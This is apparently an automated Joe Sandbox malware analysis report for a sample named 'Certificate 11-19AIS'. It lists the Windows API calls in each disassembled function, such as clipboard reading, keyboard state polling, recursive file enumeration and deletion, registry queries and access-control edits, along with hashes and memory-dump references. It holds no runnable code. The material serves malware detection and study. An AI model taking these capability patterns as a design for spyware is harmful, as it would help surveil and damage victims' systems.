                                                                              • Instruction Fuzzy Hash: F451007290821CAACB21EBA5DC48DEF77BCBF05310F0505E6E645E3241DB7A97498FA4
                                                                              APIs
                                                                              • OpenClipboard.USER32(0084DC00), ref: 00806B36
                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00806B44
                                                                              • GetClipboardData.USER32(0000000D), ref: 00806B4C
                                                                              • CloseClipboard.USER32 ref: 00806B58
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00806B74
                                                                              • CloseClipboard.USER32 ref: 00806B7E
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00806B93
                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00806BA0
                                                                              • GetClipboardData.USER32(00000001), ref: 00806BA8
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00806BB5
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00806BE9
                                                                              • CloseClipboard.USER32 ref: 00806CF6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                              • String ID:
                                                                              • API String ID: 3222323430-0
                                                                              • Opcode ID: 091cccf9ba11b5b0bf657491f0f9122fab6f6282cdcd85c8ceda964cd6481617
                                                                              • Instruction ID: 6eae796eef8932a6eecc513d12d190a924a1d59d3572a308994daf32f9ec380b
                                                                              • Opcode Fuzzy Hash: 091cccf9ba11b5b0bf657491f0f9122fab6f6282cdcd85c8ceda964cd6481617
                                                                              • Instruction Fuzzy Hash: 7E51B071200305ABD311AF64DD5AFAF77A8FF94B10F004429F666D71E1EF74E8158A62
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 007FF62B
                                                                              • FindClose.KERNEL32(00000000), ref: 007FF67F
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007FF6A4
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007FF6BB
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 007FF6E2
                                                                              • __swprintf.LIBCMT ref: 007FF72E
                                                                              • __swprintf.LIBCMT ref: 007FF767
                                                                              • __swprintf.LIBCMT ref: 007FF7BB
                                                                                • Part of subcall function 007D172B: __woutput_l.LIBCMT ref: 007D1784
                                                                              • __swprintf.LIBCMT ref: 007FF809
                                                                              • __swprintf.LIBCMT ref: 007FF858
                                                                              • __swprintf.LIBCMT ref: 007FF8A7
                                                                              • __swprintf.LIBCMT ref: 007FF8F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                              • API String ID: 835046349-2428617273
                                                                              • Opcode ID: f4b1d1c1c86704a3b2364b3dae5097bae81237bce995fdd8179118c2c23ecd4f
                                                                              • Instruction ID: 7a546bd897b5b9d8de3a58b8f2509f30259d8fe34eebfba6ab87c5b3d9c9d798
                                                                              • Opcode Fuzzy Hash: f4b1d1c1c86704a3b2364b3dae5097bae81237bce995fdd8179118c2c23ecd4f
                                                                              • Instruction Fuzzy Hash: 36A1F0B2508344EBC311EB94C889EAFB7ECBF94704F44491EF695C2252EB38D949C762
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00801B50
                                                                              • _wcscmp.LIBCMT ref: 00801B65
                                                                              • _wcscmp.LIBCMT ref: 00801B7C
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00801B8E
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00801BA8
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00801BC0
                                                                              • FindClose.KERNEL32(00000000), ref: 00801BCB
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00801BE7
                                                                              • _wcscmp.LIBCMT ref: 00801C0E
                                                                              • _wcscmp.LIBCMT ref: 00801C25
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00801C37
                                                                              • SetCurrentDirectoryW.KERNEL32(008639FC), ref: 00801C55
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00801C5F
                                                                              • FindClose.KERNEL32(00000000), ref: 00801C6C
                                                                              • FindClose.KERNEL32(00000000), ref: 00801C7C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1803514871-438819550
                                                                              • Opcode ID: 28797e7b35262eb3aeac81adb0774d04e2219b89cd2f77f0d6618e963fc6d748
                                                                              • Instruction ID: 62e7e5ee2a25533d0fe2c7e8aa04ee1fb92f073d6c7b5324262fed60284f64ec
                                                                              • Opcode Fuzzy Hash: 28797e7b35262eb3aeac81adb0774d04e2219b89cd2f77f0d6618e963fc6d748
                                                                              • Instruction Fuzzy Hash: A131A032A00319ABDF50ABB0EC4DADE77ACFF45334F104596E911E31D0EB78DA858A64
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00801CAB
                                                                              • _wcscmp.LIBCMT ref: 00801CC0
                                                                              • _wcscmp.LIBCMT ref: 00801CD7
                                                                                • Part of subcall function 007F6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007F6BEF
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00801D06
                                                                              • FindClose.KERNEL32(00000000), ref: 00801D11
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00801D2D
                                                                              • _wcscmp.LIBCMT ref: 00801D54
                                                                              • _wcscmp.LIBCMT ref: 00801D6B
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00801D7D
                                                                              • SetCurrentDirectoryW.KERNEL32(008639FC), ref: 00801D9B
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00801DA5
                                                                              • FindClose.KERNEL32(00000000), ref: 00801DB2
                                                                              • FindClose.KERNEL32(00000000), ref: 00801DC2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 1824444939-438819550
                                                                              • Opcode ID: ee665d90c5cb516de13abaa86a9cc0dd32f501b81579317a3a9880d0cc8f37fe
                                                                              • Instruction ID: 2c942a77dc0f8427409f3d2b0c3570500b9743d2633816507b5a9a38bf14d7aa
                                                                              • Opcode Fuzzy Hash: ee665d90c5cb516de13abaa86a9cc0dd32f501b81579317a3a9880d0cc8f37fe
                                                                              • Instruction Fuzzy Hash: 8531C132A0061ABBDF50ABA0EC4DADE77ADFF45334F104956EC11E31D0DB78DA458A64
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                              • API String ID: 2102423945-2023335898
                                                                              • Opcode ID: 1fc50c03b0f70e309679416f1c9c2227690770510fc9cc9f2119e276ebbee21f
                                                                              • Instruction ID: 06744ad0a1a6c5108b9a4ea57fa731842388e1a2c8547ec8f073b19bffe0f631
                                                                              • Opcode Fuzzy Hash: 1fc50c03b0f70e309679416f1c9c2227690770510fc9cc9f2119e276ebbee21f
                                                                              • Instruction Fuzzy Hash: 49829071D04229DBCF28CF98C8807EDBBB1FF84314F25816AD955AB251E7789E85CB90
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 008009DF
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 008009EF
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008009FB
                                                                              • __wsplitpath.LIBCMT ref: 00800A59
                                                                              • _wcscat.LIBCMT ref: 00800A71
                                                                              • _wcscat.LIBCMT ref: 00800A83
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00800A98
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00800AAC
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00800ADE
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00800AFF
                                                                              • _wcscpy.LIBCMT ref: 00800B0B
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00800B4A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                              • String ID: *.*
                                                                              • API String ID: 3566783562-438819550
                                                                              • Opcode ID: 1c2af3c5224d4a94ce9955e3c78a8bc52786d1ade3feb69ce72c8572489b0d96
                                                                              • Instruction ID: 74e79169d9a37842e956a0029253f5a9554dda02fd931492d2f58b276b74ddfc
                                                                              • Opcode Fuzzy Hash: 1c2af3c5224d4a94ce9955e3c78a8bc52786d1ade3feb69ce72c8572489b0d96
                                                                              • Instruction Fuzzy Hash: 346146725083459FD710EF60C848AAEB7E8FF89314F04491EE989C7292EB35E945CF92
                                                                              APIs
                                                                                • Part of subcall function 007EABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007EABD7
                                                                                • Part of subcall function 007EABBB: GetLastError.KERNEL32(?,007EA69F,?,?,?), ref: 007EABE1
                                                                                • Part of subcall function 007EABBB: GetProcessHeap.KERNEL32(00000008,?,?,007EA69F,?,?,?), ref: 007EABF0
                                                                                • Part of subcall function 007EABBB: HeapAlloc.KERNEL32(00000000,?,007EA69F,?,?,?), ref: 007EABF7
                                                                                • Part of subcall function 007EABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007EAC0E
                                                                                • Part of subcall function 007EAC56: GetProcessHeap.KERNEL32(00000008,007EA6B5,00000000,00000000,?,007EA6B5,?), ref: 007EAC62
                                                                                • Part of subcall function 007EAC56: HeapAlloc.KERNEL32(00000000,?,007EA6B5,?), ref: 007EAC69
                                                                                • Part of subcall function 007EAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007EA6B5,?), ref: 007EAC7A
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007EA6D0
                                                                              • _memset.LIBCMT ref: 007EA6E5
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007EA704
                                                                              • GetLengthSid.ADVAPI32(?), ref: 007EA715
                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 007EA752
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007EA76E
                                                                              • GetLengthSid.ADVAPI32(?), ref: 007EA78B
                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007EA79A
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 007EA7A1
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007EA7C2
                                                                              • CopySid.ADVAPI32(00000000), ref: 007EA7C9
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007EA7FA
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007EA820
                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007EA834
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3996160137-0
                                                                              • Opcode ID: 9493cd8b7f8bb740dcc41ee619bdee3b92dd3ca6b009fad027f9052bb4f324b0
                                                                              • Instruction ID: 048d03db4661453bfedef72e9a5c629f341bc4a9a3f2bf3e90cc4543d39f046d
                                                                              • Opcode Fuzzy Hash: 9493cd8b7f8bb740dcc41ee619bdee3b92dd3ca6b009fad027f9052bb4f324b0
                                                                              • Instruction Fuzzy Hash: 2B514C71901249BFDF05DFA6DC44AEEBBB9FF48300F048529F911AA291D738AE05CB61
                                                                              APIs
                                                                                • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007F5FA6,?), ref: 007F6ED8
                                                                                • Part of subcall function 007F72CB: GetFileAttributesW.KERNEL32(?,007F6019), ref: 007F72CC
                                                                              • _wcscat.LIBCMT ref: 007F6441
                                                                              • __wsplitpath.LIBCMT ref: 007F645F
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 007F6474
                                                                              • _wcscpy.LIBCMT ref: 007F64A3
                                                                              • _wcscat.LIBCMT ref: 007F64B8
                                                                              • _wcscat.LIBCMT ref: 007F64CA
                                                                              • DeleteFileW.KERNEL32(?), ref: 007F64DA
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 007F64EB
                                                                              • FindClose.KERNEL32(00000000), ref: 007F6506
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                              • String ID: \*.*$p1ou`Kpu
                                                                              • API String ID: 2643075503-531078103
                                                                              • Opcode ID: 6091b9a25de45528fb587853f68dcecfeb33502ed6187efb0307b6c19aba7459
                                                                              • Instruction ID: ad5a280189c27ad8a5b4283dce76648fce8addf29b8d5048e952dafb5071a756
                                                                              • Opcode Fuzzy Hash: 6091b9a25de45528fb587853f68dcecfeb33502ed6187efb0307b6c19aba7459
                                                                              • Instruction Fuzzy Hash: 9C314BB2409388AEC721EBA488899EF77EC6F55310F44491AF6D9C3241EA39D50987A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                              • API String ID: 0-4052911093
                                                                              • Opcode ID: 26d40b820e24ebd73d381c2d3bdc98302e331be1d2078c49f236013c9edf4392
                                                                              • Instruction ID: 2ec50c8f2c19355d0c40c9179b3d403d68a1c93ff38275fb0c67efe306404125
                                                                              • Opcode Fuzzy Hash: 26d40b820e24ebd73d381c2d3bdc98302e331be1d2078c49f236013c9edf4392
                                                                              • Instruction Fuzzy Hash: 95724071E04219DBDB28CF98D8817EEB7B5FF88310F14416AE915EB281DB749E81DB90
                                                                              APIs
                                                                                • Part of subcall function 00813C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0081328E
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0081332D
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008133C5
                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00813604
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00813611
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1240663315-0
                                                                              • Opcode ID: 1e3363ac239ec3cbd622aa51ad81d2a1cf494d45380c0a43c16d1e8c38e26c4d
                                                                              • Instruction ID: 8e30ed381af204329e4e69a8876a5a79d82cb81c4e2a542552870e04e2d32247
                                                                              • Opcode Fuzzy Hash: 1e3363ac239ec3cbd622aa51ad81d2a1cf494d45380c0a43c16d1e8c38e26c4d
                                                                              • Instruction Fuzzy Hash: 82E15A31204200EFCB15DF28C995EAABBE9FF88714F04896DF54ADB261DB34E945CB52
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?), ref: 007F2B5F
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 007F2BE0
                                                                              • GetKeyState.USER32(000000A0), ref: 007F2BFB
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 007F2C15
                                                                              • GetKeyState.USER32(000000A1), ref: 007F2C2A
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 007F2C42
                                                                              • GetKeyState.USER32(00000011), ref: 007F2C54
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 007F2C6C
                                                                              • GetKeyState.USER32(00000012), ref: 007F2C7E
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 007F2C96
                                                                              • GetKeyState.USER32(0000005B), ref: 007F2CA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: 6628917f01ea60817f3cd333edc9f5ffe42ea81910880f0e649640e3b6859e26
                                                                              • Instruction ID: 87299855103663aa48003f317b131209d4079c371cd0242163749ec4681c072e
                                                                              • Opcode Fuzzy Hash: 6628917f01ea60817f3cd333edc9f5ffe42ea81910880f0e649640e3b6859e26
                                                                              • Instruction Fuzzy Hash: BC4191746047CE69FF359B6488043B9BEA0AB11354F048459DBC6563C3EBAC99C9C7B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                              • String ID:
                                                                              • API String ID: 1737998785-0
                                                                              • Opcode ID: d92ebc79c5a9ac4b2d53cd7f95fa1551b33d8e18c4d77f8873f26a50929e31fe
                                                                              • Instruction ID: c4cfbc510592dd242cabdbc9dcebf7d9f72ebec0cf2724055efb95eb6d9d5ca8
                                                                              • Opcode Fuzzy Hash: d92ebc79c5a9ac4b2d53cd7f95fa1551b33d8e18c4d77f8873f26a50929e31fe
                                                                              • Instruction Fuzzy Hash: 62219F31300614DFDB11AF64EC4AF2E77A8FF54710F04841AF91ADB2A1EB75E8218B90
                                                                              APIs
                                                                                • Part of subcall function 007E9ABF: CLSIDFromProgID.OLE32 ref: 007E9ADC
                                                                                • Part of subcall function 007E9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 007E9AF7
                                                                                • Part of subcall function 007E9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 007E9B05
                                                                                • Part of subcall function 007E9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 007E9B15
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0080C235
                                                                              • _memset.LIBCMT ref: 0080C242
                                                                              • _memset.LIBCMT ref: 0080C360
                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0080C38C
                                                                              • CoTaskMemFree.OLE32(?), ref: 0080C397
                                                                              Strings
                                                                              • NULL Pointer assignment, xrefs: 0080C3E5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 1300414916-2785691316
                                                                              • Opcode ID: d437d0260f97f128f4e9d4b6387a48e5ece98306d8a24fb80c46723952bfbc8e
                                                                              • Instruction ID: 2bcf291ea158996e8a1a363690e4613cda3adab42f68c151502503324cf9ce1a
                                                                              • Opcode Fuzzy Hash: d437d0260f97f128f4e9d4b6387a48e5ece98306d8a24fb80c46723952bfbc8e
